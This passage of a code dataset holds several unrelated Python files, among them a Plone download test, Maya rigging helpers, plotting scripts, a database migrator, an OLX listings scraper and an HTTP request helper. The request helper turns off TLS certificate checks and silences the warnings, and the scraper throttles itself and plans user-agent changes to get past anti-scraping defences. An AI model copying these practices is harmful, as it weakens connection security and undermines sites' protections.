opengever.testing.readonly import ZODBStorageInReadonlyMode\nfrom zope.event import notify\nimport transaction\n\n\nclass TestFileDownloadInReadOnly(IntegrationTestCase):\n\n features = ('bumblebee', )\n\n @browsing\n def test_file_download_journaling_doesnt_cause_readonly_error(self, browser):\n self.login(self.regular_user, browser)\n\n # Get other potential writes-on-read out of the way.\n # Those are not what we're testing here.\n browser.open(self.document,\n view='tabbed_view/listing',\n data={'view_name': 'overview'})\n transaction.commit()\n\n with ZODBStorageInReadonlyMode():\n browser.find('Download copy').click()\n browser.find('Download').click()\n transaction.commit()\n\n self.assertEqual(200, browser.status_code)\n self.assertEqual(self.document.file._data, browser.contents)\n\n self.assertEqual(\n len(self.document.file._data),\n int(browser.headers['Content-Length']))\n\n self.assertEqual(\n 'application/vnd.openxmlformats-officedocument.'\n 'wordprocessingml.document',\n browser.headers['Content-Type'])\n\n @browsing\n def test_downloading_doc_pdf_journaling_doesnt_cause_readonly_error(self, browser):\n self.login(self.regular_user, browser)\n\n with ZODBStorageInReadonlyMode():\n notify(PDFDownloadedEvent(self.document))\n transaction.commit()\n\n # Last journal entry should be document added, not 'PDF downloaded'\n msg = u'Document added: Vertr\\xe4gsentwurf'\n self.assert_journal_entry(self.document, DOCUMENT_ADDED_ACTION, msg)\n\n @browsing\n def test_downloading_mail_pdf_journaling_doesnt_cause_readonly_error(self, browser):\n self.login(self.regular_user, browser)\n\n with ZODBStorageInReadonlyMode():\n notify(PDFDownloadedEvent(self.mail_eml))\n transaction.commit()\n\n # Last journal entry should be document added, not 'PDF downloaded'\n msg = u'Document added: Die B\\xfcrgschaft'\n self.assert_journal_entry(self.mail_eml, DOCUMENT_ADDED_ACTION, 
msg)\n","sub_path":"opengever/readonly/tests/test_file_download.py","file_name":"test_file_download.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177996109","text":"import pymel.core as pymel\nimport logging\n\n'''\nThese helpers facilitate the creation of utility nodes by automatically connecting or setting their attributes.\n'''\n__aBasicTypes = [int, float, bool, pymel.datatypes.Matrix, pymel.datatypes.Vector]\ndef _isBasicType(_val):\n global __aBasicTypes\n return type(_val) in __aBasicTypes\n\ndef ConnectOrSetAttr(_attr, _val):\n if isinstance(_val, list) or isinstance(_val, tuple):\n\n # Note: List attribute and compound attribute don't have the same way of iterating.\n if _attr.isArray():\n for i, val in enumerate(_val):\n ConnectOrSetAttr(_attr.elementByLogicalIndex(i), val)\n elif _attr.isCompound():\n children = _attr.getChildren()\n for child, val in zip(children, _val):\n ConnectOrSetAttr(child, val)\n else:\n raise Exception(\"Can't apply value {0} on attribute {1}, need an array or compound\".format(_val, _attr))\n\n '''\n for i, pSubValue in enumerate(_val):\n ConnectOrSetAttr(_attr.elementByLogicalIndex(i), pSubValue)\n '''\n else:\n if isinstance(_val, pymel.Attribute):\n pymel.connectAttr(_val, _attr, force=True)\n elif _isBasicType(_val):\n _attr.set(_val)\n else:\n logging.error(\n '[ConnectOrSetAttr] Invalid value for attribute {0} of type {1} and value {2}'.format(_attr.name(),\n type(_val),\n _val))\n raise TypeError\n\ndef CreateUtilityNode(_sClass, *args, **kwargs):\n uNode = pymel.shadingNode(_sClass, asUtility=True)\n for sAttrName, pAttrValue in kwargs.items():\n if not uNode.hasAttr(sAttrName):\n raise Exception('[CreateUtilityNode] UtilityNode {0} doesn\'t have an {1} attribute. 
Skipping it.'.format(_sClass, sAttrName))\n else:\n ConnectOrSetAttr(uNode.attr(sAttrName), pAttrValue)\n return uNode\n\n#\n# CtrlShapes Backup\n#\ndef hold_ctrl_shapes(_oCtrl, parent=None):\n aShapes = filter(lambda x: isinstance(x, pymel.nodetypes.CurveShape), _oCtrl.getShapes())\n oSnapshot = pymel.duplicate(_oCtrl, parentOnly=True, returnRootsOnly=True)[0]\n for oShape in aShapes:\n oShape.setParent(oSnapshot, s=True, r=True)\n if parent:\n oSnapshot.setParent(parent)\n else:\n oSnapshot.setParent(world=True)\n oSnapshot.rename('_{0}'.format(_oCtrl.name()))\n return oSnapshot\n\ndef fetch_ctrl_shapes(source, target):\n # Remove any previous shapes\n pymel.delete(filter(lambda x: isinstance(x, pymel.nodetypes.CurveShape), target.getShapes()))\n for source_shape in source.getShapes():\n source_shape.setParent(target, r=True, s=True)\n source_shape.rename(target.name() + 'Shape')\n\n # TODO: Restore AnnotationShapes\n pymel.delete(source)\n\ndef BackupCtrlShapes(**kwargs):\n aCtrls = [o.getParent() for o in pymel.ls('anm_*', type='nurbsCurve')]\n return [hold_ctrl_shapes(oCtrl, **kwargs) for oCtrl in aCtrls]\n\n# TODO: Fix bug when two objects have the same name.\ndef RestoreCtrlShapes():\n aSources = [o.getParent() for o in pymel.ls('_anm_*', type='nurbsCurve')]\n\n for oSource in aSources:\n sTargetName = oSource.name()[1:]\n if pymel.objExists(sTargetName):\n oTarget = pymel.PyNode(str(sTargetName))\n\n fetch_ctrl_shapes(oSource, oTarget)\n #pymel.delete(oSource)\n\ndef create_squash_atts(attStretch, numSegments):\n import libFormula\n if not isinstance(attStretch, pymel.Attribute):\n raise TypeError(\"Expected pymel Attribute, got {0} ({1})\".format(attStretch, type(attStretch)))\n return_vals = []\n for i in range(numSegments):\n pos = float(i)/(numSegments-1) * 2.0 - 1.0\n attSquash = libFormula.parse(\"s^(e^(x^2))\", s=attStretch, x=pos)\n return_vals.append(attSquash)\n return return_vals\n","sub_path":"omtk/libs/libRigging.py","file_name":"libRigging.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"109270016","text":"#!/usr/bin/python3\n\n'''module for shapes'''\n\n\nfrom .base import Base\nfrom sys import stdout\n\n\nclass Rectangle(Base):\n '''Rectangle Class that inherits from Base Class'''\n def __init__(self, width, height, x=0, y=0, id=None):\n '''Initialisation of the instance'''\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n # *********** Properties Setters and Getters Section *************\n\n # width Property\n @property\n def width(self):\n '''retrieves the __width attribute value'''\n return self.__width\n\n @width.setter\n def width(self, value):\n '''sets the new value to the __width attribute'''\n if type(value) is not int:\n raise TypeError('width must be an integer')\n if value <= 0:\n raise ValueError('width must be > 0')\n self.__width = value\n\n # height Property\n @property\n def height(self):\n '''retrieves the __height attribute value'''\n return self.__height\n\n @height.setter\n def height(self, value):\n '''sets the new value to the __height attribute'''\n if type(value) is not int:\n raise TypeError('height must be an integer')\n if value <= 0:\n raise ValueError('height must be > 0')\n self.__height = value\n\n # x Property\n @property\n def x(self):\n '''retrieves the __x attribute value'''\n return self.__x\n\n @x.setter\n def x(self, value):\n '''sets the new value to the __x attribute'''\n if 
type(value) is not int:\n raise TypeError('x must be an integer')\n if value < 0:\n raise ValueError('x must be >= 0')\n self.__x = value\n\n # y Property\n @property\n def y(self):\n '''retrieves the __y attribute value'''\n return self.__y\n\n @y.setter\n def y(self, value):\n '''sets the new value to the __y attribute'''\n if type(value) is not int:\n raise TypeError('y must be an integer')\n if value < 0:\n raise ValueError('y must be >= 0')\n self.__y = value\n\n # **** End of Properties Setters and Getters Section *****\n\n # *************** Instance Methods Section ***************\n\n def area(self):\n '''calculates the rectangle area\n Returns:\n the calculation result \"the area\"\n '''\n return self.width * self.height\n\n def display(self):\n '''prints the rectangle instance with the # character'''\n buffer = [' ' * self.x + '#' * self.width for h in range(self.height)]\n print('\\n' * self.y + '\\n'.join(buffer))\n\n def update(self, *args, **kwargs):\n '''Updates the instance attributes from\n the arguments passed in a strict order\n or from the kwargs\n '''\n i = 0\n attributes = ['id', 'width', 'height', 'x', 'y']\n if len(args) > 0:\n for attr in attributes:\n if i > len(args) - 1:\n break\n setattr(self, attr, args[i])\n i += 1\n else:\n for key, value in kwargs.items():\n if key not in attributes:\n continue\n setattr(self, key, value)\n\n def to_dictionary(self):\n '''returns the dictionary representation of a Rectangle instance'''\n return {\n 'id': self.id,\n 'x': self.x,\n 'y': self.y,\n 'width': self.width,\n 'height': self.height\n }\n\n # *********** End of Instance Methods Section ************\n\n # **************** Magic Methods Section *****************\n\n def __str__(self):\n '''returns the string representation of the instance'''\n return (f'[Rectangle] ({self.id}) {self.x}/{self.y}'\n f' - {self.width}/{self.height}')\n\n # ************ End of Magic Methods Section **************\n","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248031881","text":"import torch\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator, AutoMinorLocator\nfrom compress_training import DATASETS\nfrom glob import glob\n\n# These attributes are kept for retro-compatibility with\n# experiments that did not have them\nDEFAULT_EXTRA_PARAMS = ['compression']\n\ndef summarize_experiment(experiment, extra_params):\n val_acc = experiment[experiment.measure == 'val_acc']\n best_val = val_acc.sort_values(by='value', ascending=False).iloc[0]\n epoch = best_val.epoch\n summary = experiment[experiment.epoch==epoch].groupby('measure').mean()\n keys = list(summary.index) + ['time', 'epoch', 'lambda_start', 'lambda_decay', 'layers', 'iteration', 'algorithm']\n\n values = list(summary.value) + [float(best_val.time), int(epoch)] + list(extra_params)\n missing_values = len(keys) - len(values) # Compute the number of missing parameters\n # Add default values for the missing parameters\n if missing_values > 0:\n values += DEFAULT_EXTRA_PARAMS[-missing_values:]\n result = pd.DataFrame([values], columns=keys)\n if min(experiment[experiment.measure == 'lambda'].epoch) == 0: # Solve bug\n test = experiment[experiment.epoch==epoch-1].groupby('measure').mean()\n result['lambda'] = pd.Series([test.loc['lambda'].value])\n return result\n\ndef 
merge_all_experiments(experiments):\n return pd.concat(experiments).fillna(0)\n\ndef get_experiments(experiment_name):\n files = glob('./experiments/%s/*.experiment' % experiment_name)\n experiments = [torch.load(x, 'rb') for x in files]\n ids = [x.split('/')[-1].replace('.experiment', '') for x in files]\n return ids, experiments\n\ndef get_summary(experiments):\n summarized = [summarize_experiment(x[1], x[0]) for x in experiments]\n summary = merge_all_experiments([x for x in summarized if x is not None])\n # summary['lambda_start'] = np.log10(summary['lambda_start'])\n summary.reset_index(drop=True, inplace=True)\n return summary\n\ndef best_experiment(summary, experiments, mode):\n s = summary.sort_values(by='val_acc')\n best = s.iloc[-1]\n return [x for x in experiments if x[1][x[1].measure == 'val_acc'].value.max() == best.val_acc][0]\n\ndef plot_experiment(experiment, prefix, mode):\n infos, x = experiment\n capacities = x[x.measure == 'capacity']\n train_acc = x[x.measure == 'mean_train_acc']\n test_acc = x[x.measure == 'test_acc']\n val_acc = x[x.measure == 'val_acc']\n best_val_acc_idx = val_acc.value.argmax()\n s = summarize_experiment(x, infos).iloc[0]\n best_val_acc = s.val_acc\n best_test_acc = s.test_acc\n best_capacity = s.capacity\n fig = plt.figure(figsize=(10, 5))\n a = fig.gca()\n a.grid()\n a.set_xlabel('Time (s)')\n b = a.twinx()\n b.set_yscale('log')\n b.set_ylabel('Capacity in neurons')\n b.plot(capacities.time, capacities.value, label='Total Capacity')\n if mode == 'classification':\n a.set_ylabel('Accuracy (%)')\n a.plot(train_acc.time, train_acc.value * 100, label='Train accuracy')\n a.plot(val_acc.time, val_acc.value * 100, label='Validation accuracy')\n a.plot(test_acc.time, test_acc.value * 100, label='Test accuracy')\n a.yaxis.set_minor_locator(MultipleLocator(0.1))\n a.yaxis.set_major_locator(MultipleLocator(1))\n a.legend(loc='lower left')\n else:\n a.set_ylabel('MSE')\n a.plot(train_acc.time, -train_acc.value, label='Train Error')\n a.plot(val_acc.time, -val_acc.value, label='Validation Error')\n a.plot(test_acc.time, -test_acc.value, label='Test Error')\n a.set_yscale('log')\n a.legend(loc='upper right')\n a.yaxis.grid(b=True, which='major', linestyle='-')\n a.yaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.xaxis.grid(b=True, which='major', linestyle='-')\n a.xaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n plt.title('%s - Best Model (%s layer(s), %s neurons, v=%s, t=%s)' % (prefix, infos[2], int(best_capacity), -best_val_acc, -best_test_acc))\n # plt.savefig('./plots/%s_compressor_accuracies_size.png' % prefix)\n # plt.close()\n\n\ndef remove_outliers(summaries, dataset_name):\n outlier_limit = (-np.inf, np.inf)\n if dataset_name == 'Add10':\n outlier_limit = (0, 1.3)\n elif dataset_name == 'Airfoil':\n outlier_limit = (0, 25)\n elif dataset_name == 'Poker':\n outlier_limit = (0.95, 1)\n tac = np.abs(summaries.test_acc)\n return summaries[np.bitwise_and(tac >= outlier_limit[0], tac <= outlier_limit[1])]\n\n\ndef plot_algorithm_comparison(summaries, dataset_name, mode='classification', metric='val_acc', first='compression', other='static'):\n cmap_first = 'Greens'\n cmap_second = 'Reds'\n\n first_summaries = summaries[summaries.algorithm == first]\n second_summaries = summaries[summaries.algorithm == other]\n plt.figure()\n if mode == 'classification':\n factor1 = 100\n factor2 = 100\n else:\n factor1 = -1\n factor2 = -1\n if metric != 'val_acc':\n factor1 = 1\n\n other = len(second_summaries[metric]) > 0\n 
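# Bivariate KDE overlays: shade the joint density of (metric, test accuracy) for the compression (green) and static (red) groups\n 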
sns.kdeplot(factor1 * first_summaries[metric], factor2 * first_summaries.test_acc, cmap=cmap_first, shade_lowest=False,shade=True, alpha=0.8, label=False)\n if other:\n sns.kdeplot(factor1 * second_summaries[metric], factor2 * second_summaries.test_acc, cmap=cmap_second, shade_lowest=False,shade=True, alpha=0.5, label=False)\n plt.scatter(factor1 * first_summaries[metric], factor2 * first_summaries.test_acc, alpha=1, color=sns.color_palette(cmap_first)[1], edgecolors='0.3', label=None)\n if other:\n plt.scatter(factor1 * second_summaries[metric], factor2 * second_summaries.test_acc, alpha=0.5, color=sns.color_palette(cmap_second)[1], edgecolors='0.3', label=None)\n a = plt.gca()\n a.yaxis.set_minor_locator(AutoMinorLocator())\n a.xaxis.set_minor_locator(AutoMinorLocator())\n if mode == 'classification':\n plt.ylabel('Testing accuracy (%)')\n if metric == 'val_acc':\n plt.xlabel('Validation accuracy (%)')\n # a.yaxis.set_minor_locator(MultipleLocator(0.1))\n # a.yaxis.set_major_locator(MultipleLocator(1))\n # a.xaxis.set_minor_locator(MultipleLocator(0.1))\n # a.xaxis.set_major_locator(MultipleLocator(1))\n elif metric == 'capacity':\n plt.xlabel('Capacity in neurons')\n else:\n plt.ylabel('Testing MSE')\n if metric == 'val_acc':\n plt.xlabel('Validation MSE')\n elif metric == 'capacity':\n plt.xlabel('Capacity in neurons')\n\n a.yaxis.grid(b=True, which='major', linestyle='-')\n a.yaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.xaxis.grid(b=True, which='major', linestyle='-')\n a.xaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.set_axisbelow(True)\n if 'reference' in DATASETS[dataset_name]:\n plt.axhline(abs(factor2) *DATASETS[dataset_name]['reference'], label='Best result for this architecture')\n handles, labels = [list(x) for x in a.get_legend_handles_labels()]\n else:\n handles = []\n labels = []\n\n first_rectangle = plt.Rectangle((0, 0), 1, 1, color=sns.color_palette(cmap_first)[-3])\n second_rectangle = plt.Rectangle((0, 0), 1, 1, color=sns.color_palette(cmap_second)[-3])\n plt.legend([first_rectangle, second_rectangle] + handles, ['Deterministic Compression Training', 'Classic Training'] + labels)\n plt.gcf().set_size_inches((10, 10))\n if metric == 'val_acc':\n plt.axes().set_aspect('equal', 'datalim')\n plt.title('%s - Algorithm comparison for testing and validation accuracies' % dataset_name)\n else:\n plt.title('%s - Algorithm comparison for testing and capacity' % dataset_name)\n plt.savefig('./plots/%s_test_%s_compression_static_comparison.png' % (dataset_name, metric))\n plt.close()\n\ndef plot_dataset(dataset_name, mode='classification'):\n ids, experiments = get_experiments(dataset_name)\n summaries = remove_outliers(get_summary(experiments), dataset_name)\n best = best_experiment(summaries, experiments, mode=mode)\n plot_experiment(best, dataset_name, mode)\n plot_algorithm_comparison(summaries, dataset_name, mode, metric='val_acc')\n plot_algorithm_comparison(summaries, dataset_name, mode, metric='capacity')\n try:\n pairs = find_closest_experiments(summaries)\n plot_compression_improvements(pairs, dataset_name, mode)\n except:\n pass # Skip if corresponding pairs were not generated\n\ndef find_closest_experiments(summaries, first='compression', second='static'):\n first_summaries = summaries[summaries.algorithm == first].sort_values('val_acc', ascending=False).drop_duplicates(['capacity'])\n second_summaries = summaries[summaries.algorithm == second].sort_values('val_acc', ascending=False).drop_duplicates(['capacity'])\n first_cap = 
first_summaries.capacity\n second_cap = second_summaries.capacity\n\n result = []\n for i, x in enumerate(first_cap):\n index = np.argmin(np.abs(second_cap.values - x))\n a = first_summaries.iloc[i]\n b = second_summaries.iloc[index]\n result.append((a, b))\n return result\n\ndef plot_compression_improvements(pairs, dataset_name, mode='classification'):\n plt.figure(figsize=(10, 5))\n if mode == 'classification':\n factor = 100\n else:\n factor = 1\n plt.scatter([x[0].capacity for x in pairs], [(x[0].test_acc - x[1].test_acc) * factor for x in pairs],\n color='C1', linewidth=1, marker='o', s=100, edgecolor='black')\n a = plt.gca()\n plt.xscale('log')\n plt.title('%s - Improvement in testing accuracy for compress training at fixed capacity' % dataset_name)\n plt.axhline(y=0, color='black', linewidth=3)\n plt.xlabel('Model capacity (neurons)')\n if mode == 'classification':\n plt.ylabel('Absolute accuracy delta (%)')\n a.yaxis.set_minor_locator(AutoMinorLocator())\n a.yaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.xaxis.grid(b=True, which='minor', alpha=0.4, linestyle='--')\n a.yaxis.grid(b=True, which='major', linestyle='-')\n a.xaxis.grid(b=True, which='major', linestyle='-')\n plt.savefig('./plots/%s_compression_training_improvements.png' % dataset_name)\n plt.close()\n\n\nif __name__ == '__main__':\n # plot_dataset('MNIST')\n # plot_dataset('FashionMNIST')\n # plot_dataset('Poker')\n # plot_dataset('Add10', mode='regression')\n # plot_dataset('Airfoil', mode='regression')\n pass\n","sub_path":"expriment_summary.py","file_name":"expriment_summary.py","file_ext":"py","file_size_in_byte":10543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190099789","text":"\"\"\"SysMonitor Database migration tool\"\"\"\n\nimport logging\nimport os\nimport importlib\nimport re\nimport ast\n\nfrom playhouse.db_url import connect\nfrom playhouse.migrate import PostgresqlMigrator, SqliteMigrator, MySQLMigrator\n\nfrom sysmonitor.configuration import Configuration\nfrom sysmonitor import release\n\nfrom sysmonitor.models.database import DatabaseVariable\nfrom sysmonitor.models.host import Host, Disk, Resource, Service, ServiceHistory\n\nLOGGER = logging.getLogger(__name__)\n\nclass Migrator():\n \"\"\"\n Migration Tool\n\n It executes migration scripts when needed.\n\n These scripts must be located inside a file named migrate.py, under a\n folder named after the target version, inside the migrations folder.\n Example for a migration targeting version 1.0.0:\n migrations/1.0.0/migrate.py\n\n Inside the file, the migration code must be inside a function called migrate\n and it receives one argument, the database object\n \"\"\"\n def __init__(self):\n self.config = Configuration()\n db_url = self.config.get(\"database\", \"url\")\n self.database = connect(db_url)\n if \"postgresql\" in db_url:\n self.migrator_class = PostgresqlMigrator\n elif \"mysql\" in db_url:\n self.migrator_class = MySQLMigrator\n elif \"sqlite\" in db_url:\n self.migrator_class = SqliteMigrator\n else:\n raise ValueError(\"Invalid database type for migrations\")\n\n\n def do_migration(self):\n \"\"\"\n Execute the migration.\n\n If no tables exist, it runs peewee's create_tables method.\n If tables exist, it runs the necessary migration scripts\n \"\"\"\n self.database.connect()\n if self.database.get_tables():\n self.upgrade()\n else:\n self.create()\n self.update_version()\n\n def create(self):\n \"\"\"Create tables using peewee create_tables method\"\"\"\n 
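# create_tables() issues CREATE TABLE for every model listed, letting peewee resolve the creation order\n 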
self.database.create_tables([DatabaseVariable, Host, Disk, Resource,\n Service, ServiceHistory])\n LOGGER.info(\"Created tables\")\n uname = os.uname()\n Host.create(name=uname.nodename, address=\"http://127.0.0.1:8068\",\n requires_authentication=False, active=False,\n nodename=uname.nodename, os=\" \".join(uname))\n LOGGER.info(\"Created a host for this machine\")\n\n def upgrade(self):\n \"\"\"Executes migration scripts\"\"\"\n # Check if upgrade is required\n db_version = ast.literal_eval(DatabaseVariable.get_variable(\"version\"))\n if db_version >= release.version_db:\n LOGGER.debug(\"Database in version %s. Nothing to do.\",\n \".\".join([str(x) for x in release.version_db]))\n return\n\n # Load all available migrations\n migrations_path = os.path.dirname(os.path.abspath(__file__))\n migrations_path = os.path.join(migrations_path, \"migrations\")\n migrations = set()\n for migration in os.listdir(migrations_path):\n # Migration folder must be in format x.x.x (dots escaped so \"1a2b3\" is rejected)\n if not re.match(r\"^\\d\\.\\d\\.\\d$\", migration):\n LOGGER.error(\"Invalid migration %s\", migration)\n continue\n migration = [int(x) for x in migration.split(\".\")]\n migrations.add(tuple(migration))\n\n # Discard previous migrations and do a sort\n migrations = sorted([x for x in migrations if x > db_version])\n\n # Executes the required migrations\n migrator = self.migrator_class(self.database)\n for migration in migrations:\n migration_str = \".\".join([str(x) for x in migration])\n migration_file = os.path.join(migrations_path, migration_str,\n \"migrate.py\")\n spec = importlib.util.spec_from_file_location(migration_str,\n migration_file)\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n LOGGER.info(\"Upgrading database to version %s\", migration_str)\n with self.database.atomic():\n module.migrate(migrator)\n self.update_version(migration)\n LOGGER.info(\"Database migrated to version %s\", migration_str)\n\n @staticmethod\n def update_version(version=False):\n \"\"\"\n Update the stored database version\n\n :param tuple version: New version. If False, uses release.version_db\n \"\"\"\n version = release.version_db if not version else version\n DatabaseVariable.set_variable(\"version\", version)\n","sub_path":"sysmonitor/orm/migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"94107641","text":"import logging\nimport time\nfrom datetime import datetime, timedelta\n\nimport Data_storage as ds\nimport Offer\nimport config as cfg\nimport request_composition\nfrom constants import HOUSES_CATEGORY_ID\n\nlogging.basicConfig(level=logging.INFO)\n\n\n# TODO: implement changing user agent\n# TODO: compare prices of a same listing\n# TODO: add search parameters to look into smaller market\n# TODO: get exact address from a map\n# TODO: gather list of districts, categories for search\n# TODO: save a phone number\n\n\ndef main():\n \"\"\"Parse offers according to limitations set in config file and in\n request_composition.py and create a list with results\"\"\"\n for query in ds.get_parsing_queries():\n offers_added = 0\n\n query_name = query.get(\"Name\")\n category_id = query.get(\"category_id\")\n\n cfg.category_id = category_id\n\n logging.info(f\"Parsing offers for query: {query_name}. 
\n\")\n\n list_of_offers = parse_search_results_pages(\n query.get(\"city_id\"),\n query.get(\"region_id\"),\n query.get(\"district_id\"),\n query.get(\"distance\"),\n query.get(\"query_term\"),\n query.get(\"category_id\"),\n )\n\n filtered_list_of_offers = filter_out_existing_offers(\n list_of_offers, category_id\n )\n\n for offer in filtered_list_of_offers:\n time.sleep(4) # sleep before getting next offer details\n try:\n offer_details = Offer.get_offer_details(offer)\n except (Offer.PageNotValid, AttributeError):\n continue\n update_offer_record(offer_details)\n offers_added += 1\n\n logging.info(f\"{query_name} added: {offers_added}.\")\n\n\ndef filter_out_existing_offers(list_of_offers, category_id):\n ids_in_db = ds.existing_offer_ids(category_id)\n\n filtered_list_of_offers = list()\n for offer in list_of_offers:\n try:\n olx_offer_id = int(offer.table[\"data-id\"]) # Get id of an offer\n except TypeError:\n continue\n if olx_offer_id not in ids_in_db:\n filtered_list_of_offers.append(offer)\n\n return filtered_list_of_offers\n\n\ndef parse_search_results_pages(\n city_id, region_id, district_id, distance, query_term, category_id\n):\n \"\"\"\n This function parses all offers from search pages within given limits\n and creates a list of offers with limited info\n available (price, olx_id, title).\n :param city_id:\n :param region_id:\n :param district_id:\n :param distance:\n :param query_term:\n :param category_id:\n :return:\n \"\"\"\n list_of_offers = []\n\n # Don't search for houses on pages above 10, they don't exist.\n # ('and' instead of '&': bitwise '&' binds tighter than the comparisons here)\n if category_id == HOUSES_CATEGORY_ID and cfg.search_pages_lower_limit > 10:\n return list_of_offers\n\n search_url = request_composition.compose_request(\n city_id, region_id, district_id, category_id, distance, query_term\n )\n for current_page in range(\n cfg.search_pages_lower_limit, cfg.search_pages_upper_limit\n ):\n time.sleep(2) # to slow down process for anti-parsing algorithms\n search_url[1][\"page\"] = current_page\n try:\n offers_set = Offer.get_set_of_offers(\n search_url\n ) # Parses offers from a page\n except Offer.PageNotValid:\n continue\n for offer in offers_set:\n list_of_offers.append(\n offer\n ) # Parses offers from all pages in a range and creates list\n logging.info(f\"Number of offers parsed from search: {len(list_of_offers)} \\n\")\n return list_of_offers\n\n\ndef update_offer_record(list_of_offers):\n \"\"\"\n Adds offer record if it doesn't exist in data storage\n :param list_of_offers:\n :return:\n \"\"\"\n for offer in list_of_offers:\n ds.write_to_db(offer)\n\n\nstart_time = datetime.now()\nmain()\nlogging.info(\n f\"--- Process finished in {str(timedelta(seconds=(datetime.now() - start_time).seconds))} ---\"\n)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"329829794","text":"import pandas as pd\nimport Text_Proc_Utils as TPU\n\n# This function returns a dataframe with 2 columns. Category of expenses column as a categorical variable \n# and expense description as string. 
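\n# The CSV is expected to provide a 'category' column and an 'expense description' column, which the lookups below use.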
\ndef Get_Data(File_Path):\n expenses = pd.read_csv(File_Path, index_col=None) # read_csv replaces the removed pd.DataFrame.from_csv\n \n expenses.category = expenses.category.astype(\"category\")\n \n Sentences = expenses['expense description'].tolist()\n \n return Sentences, expenses.category\n\n# This function takes the expense description sentences and returns sentence vectors\ndef Get_Feature_Vectors(Sentences,model):\n V=[]\n for sentence in Sentences:\n V.append(TPU.sent_vectorizer(sentence, model))\n return V\n\n","sub_path":"Data_Prep_Utils.py","file_name":"Data_Prep_Utils.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233723264","text":"# _*_ coding:utf-8 _*_\nimport os,sys,json\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\nimport requests\nimport urllib3\nurllib3.disable_warnings()\n\nclass SendRequestsHeader():\n def sendRequestsheader(self,apiData):\n \"\"\"\n Send the API request\n :param apiData: the API request data\n :return: the API response info, in JSON format\n \"\"\"\n try:\n # Send the request data\n method = apiData[\"method\"]\n # print(method)\n url = apiData[\"url\"]\n # print(url)\n if apiData[\"params\"] == \"\":\n par = None\n else:\n par = apiData[\"params\"]\n # print(par)\n if apiData[\"headers\"] == \"\":\n h = None\n else:\n h = apiData[\"headers\"]\n print(h)\n if apiData[\"body\"] == \"\":\n body_data = None\n else:\n body_data = apiData[\"body\"]\n\n type = apiData[\"type\"]\n #print(type)\n v = False\n if type == \"data\":\n body = body_data\n #print(body)\n elif type == \"json\":\n body =json.dumps(body_data)\n else:\n body = body_data\n #print(body)\n re =requests.request(method=method,url =url, headers =h,params = par,data=body,verify = v)\n print(re)\n msg = re.headers\n # print(msg)\n # msg['status_code']=re.status_code\n # header = re.headers\n # print(header)\n #print(msg)\n #print(re.status_code)\n return msg\n #print(re.text)\n # if method ==\"get\":\n # re = s.get(url =url, headers =h,params = par,data = body,verify = v)\n # print(re.text)\n # return re\n # elif method == \"post\":\n # re = s.post(url =url, headers =h,params = par,data = body,verify = v)\n # print(re.text)\n # return re\n except Exception as e:\n print(e)","sub_path":"lib/sendrequestheader.py","file_name":"sendrequestheader.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468742684","text":"from dataAcquisition import User\nfrom dataAcquisition import Wiki\n\nuserIDs = open('UserIDs.txt', 'r')\nfeatures = open('feature.txt', 'w')\n\n\n\ndef reputationFeature(user):\n if user.reputation > 1:\n features.write('0 ')\n else:\n features.write('1 ')\n\ndef badgeCount(user):\n if user.total_badges:\n features.write('0 ')\n else:\n features.write('1 ')\n\nfor userID in userIDs:\n user = User(userID)\n\n #import functions for gathering here\n reputationFeature(user)\n badgeCount(user)\n\n features.write('\\n')\n\nfeatures.close()\nuserIDs.close()\n","sub_path":"featureCollection.py","file_name":"featureCollection.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"225115724","text":"import json\nimport glob\nfrom tqdm import tqdm\nimport statistics\nimport os\nimport math\nfrom collections import defaultdict, Counter, OrderedDict\nimport pickle\nfrom copy import deepcopy\n\n\ndef get_repre(pair):\n h, tmp = pair\n t = list(tmp)\n new_t = ''\n if len(t) == 1:\n new_t = t[0]\n elif 
